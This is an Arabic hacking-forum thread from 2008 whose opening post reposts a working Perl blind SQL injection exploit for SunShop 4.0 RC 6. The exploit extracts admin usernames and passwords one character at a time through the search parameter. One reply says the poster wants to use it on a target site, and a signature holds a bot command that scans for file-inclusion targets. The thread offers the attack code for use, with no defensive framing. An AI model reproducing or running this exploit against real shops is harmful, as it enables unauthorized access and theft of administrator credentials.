ضع اعلانك هنا

 ضع اعلانك هنا ضع اعلانك هنا منتديات بوابة الاسلام
التاريخ 2008-8-13 التاريخ 2008-8-15 ضع اعلانك هنا ضع اعلانك هنا
 
العودة   عالم المعرفة > قسم الأنظمة والسيرفرات > مكتبة الثغرات
تحديث الصفحة SunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit
تفعيل العضوية استرجاع كلمة المرور شروط المنتــدى البحث مشاركات اليوم اجعل كافة الأقسام مقروءة
مكتبة الثغرات ثغرات المواقع , ثغرات المنتديات ثغرات الأنظمة ثغرات مجلات , ثغرات البرامج و كيفية الاستغلال ,windows, linux, freebsd, DoS, Kernel, Local, buffer, overflow, auditing, spoofing, sniffer, sniffing, vulnerability, exploit
 

SunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit

مكتبة الثغرات


إضافة رد
 
LinkBack أدوات الموضوع
 
قديم 03-23-2008, 05:17 AM   #1 (permalink)
XP

:: فريق عالم المعرفة::
 
الصورة الرمزية XP








XP غير متصل

XP has a spectacular aura aboutXP has a spectacular aura aboutXP has a spectacular aura about

افتراضي SunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit
السلام عليكم

السكربت المصاب

SunShop 4.0 RC 6


الاستثمار


كود PHP:
#!/usr/bin/perl 
use LWP::UserAgent
use Getopt::Long

if(!$ARGV[1]) 

 print "\n                         \\#'#/                      "
 print "\n                         (-.-)                       "
 print "\n   -----------------oOO---(_)---OOo------------------"
 print "\n   | SunShop v4.0 RC 6 (search) Blind SQL Injection |"
 print "\n   |      k1tk4t - Indonesia - newhack[dot]org      |"
 print "\n   |      coded by DNX [dnx(at)hackermail.com]      |"
 print "\n   --------------------------------------------------"
 print "\n[!] Vendor: http://www.turnkeywebtools.com"
 print "\n[!] Bug: in the search script, u can inject sql code in the s[cid] parameter"
 print "\n[!] Solution: install v4.0.1"
 print "\n[!] Usage: perl sunshop.pl [Host] [Path] <Options>"
 print "\n[!] Example: perl sunshop.pl 127.0.0.1 /shop/ -i 1 -c 10 -o 1 -t ss_admins"
 print "\n[!] Options:"
 print "\n       -i [no]       Valid User-ID, default is 1"
 print "\n       -c [no]       Valid Category-ID with products, default is 1"
 print "\n       -o [no]       1 = get username (default)"
 print "\n                     2 = get password"
 print "\n       -t [name]     Changes the admin table name, default is admins"
 print "\n       -p [ip:port]  Proxy support"
 print "\n"
 exit; 


my $host    $ARGV[0]; 
my $path    $ARGV[1]; 
my $user    1
my $cat     1
my $column  "username"
my $table   "admins"
my %options = (); 
GetOptions(%options"i=i""c=i""o=i""t=s""p=s"); 

print "[!] Exploiting...\n"

if($options{"i"}) { $user $options{"i"}; } 
if($options{"c"}) { $cat $options{"c"}; } 
if($options{"o"} && $options{"o"} == 2) { $column "password"; } 
if($options{"t"}) { $table $options{"t"}; } 

syswrite(STDOUT"data:"5); 

for(my $i 1$i <= 32$i++) 

 my $found 0
 my $h 48
 while(!$found && $h <= 57
 { 
   if(istrue2($host$path$table$user$i$h)) 
   { 
     $found 1
     syswrite(STDOUTchr($h), 1); 
   } 
   $h++; 
 } 
 if(!$found
 { 
   $h 97
   while(!$found && $h <= 122
   { 
     if(istrue2($host$path$table$user$i$h)) 
     { 
       $found 1
       syswrite(STDOUTchr($h), 1); 
     } 
     $h++; 
   } 
 } 


print "\n[!] Exploit done\n"

sub istrue2 

 my $host  shift
 my $path  shift
 my $table shift
 my $uid   shift
 my $i     shift
 my $h     shift

 my $ua LWP::UserAgent->new
 my $url "http://".$host.$path."index.php?l=search_list&s[title]=Y&s[short_desc]=Y&s[full_desc]=Y&s[cid]=".$cat.")%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20WHERE%20id=".$uid."),".$i.",1)=CHAR(".$h.")/*"

 if($options{"p"}) 
 { 
   $ua->proxy('http'"http://".$options{"p"}); 
 } 

 my $response $ua->get($url); 
 my $content $response->content
 my $regexp "Add To Cart"

 if($content =~ /$regexp/) 
 { 
   return 1
 } 
 else 
 { 
   return 0
 } 

التوقيع

(*) من سب صحابتي فعليه لعنة اللَّه والملائكة والناس أجمعين(*)
رواه الطبراني وهو في سلسلة الألباني الصحيحة

دعاءالشيخ خميس الزهراني

شروط التسجيل والكتابة في المنتدى

موضوع خطيرر تفضل بدخول

(اللهم أرزقنا قبل الموت توبه .. وعند الموت شهاده )

مركز تحميل الصور
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 03-23-2008, 05:24 AM   #2 (permalink)
عضو جديد






xp10px غير متصل

xp10px will become famous soon enoughxp10px will become famous soon enough

افتراضي مشاركة: SunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit
قويه


يعطيك العافيه
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 03-23-2008, 05:12 PM   #3 (permalink)
عضو فعال







the_a_n_g غير متصل

the_a_n_g will become famous soon enoughthe_a_n_g will become famous soon enough

افتراضي رد: SunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit
مشكور أخي Xp ممكن تنفع مع موقع حاطو في راسي

التوقيع


كود:
!bot @scan pages.php?ang_in= pages.php?ang_in=
"الفرد للجماعة والجماعة للفرد" مبدأالإشتراكية لكنه في الإسلام
"لكل رزقه وحظه من الدنيا" مبدأ الرأسمالية لكنه في الإسلام
"الديموقراطية" قال جل جلاله :#وأمركم شورى بينكم#
الإسلام هو السبيل للخلاص
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
إضافة رد



« الموضوع السابق | الموضوع التالي »


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are متاحة


الساعة الآن 07:04 AM.

عدد الكلمات الدلالية 70 الاكثر بحث في الموقع
الكلمات الدلالية
اخبار ادوات اطفال الاستثمار البرفست البيزون الدروس الروافض السعوديه السنه الشيعه العاب الفلاش الفوتو شوب الكويت المجوس المهدي الهكر ايران برامج برامج اختراق برامج هكر بنات تحميل تشفير تشقير الصفحات تطوير تعليم ثغره جرائم جوال حماية حوار دروس دومين رواتر شرح صميم صوره فضائح فيديو كتاب كراك كمبيوتر محاضرات منتدى مودم نطاق نطاقات نوكيا هوز bifrost buffer crypter domain downloader exploit file inclusion iran local overflow poison python server shellcode sql injection trojan version vulnerability youtube


روابط مهمة

أقسام المنتدى

الرسول الإنسان | الدفاع عن أهل السنة | فضائح و جرائم الروافض | السنه | الحوارات الهادفة | الفلاش والسويتش | الفوتوشوب | دورة الفوتوشوب | صور | العاب | البرامج المشروحه | الفرفشه والمرح | الرياضة | الفايروسات | الهاردوير والصيانة | تطوير المنتديات والمواقع | دورة تطوير منتديات vb | الحمايه | اختراق المواقع والسيرفرات | هكرز | اختراق الشات والاميل | ثغرات | البرامج | الفيجوال بيسك | المواضيع العامه | القصص واللغات|  شات

الاتصال بنا - السنة - sitemap - الأعلى

Powered by vBulletin Version 3.7.1
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd
لا تتحمل إدارة منتديات عالم المعرفة أية مسؤولية حول أي موضوع يطرح في المنتدى فإن المكتوب يعبر عن رأى صاحبه أو ناقلة

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58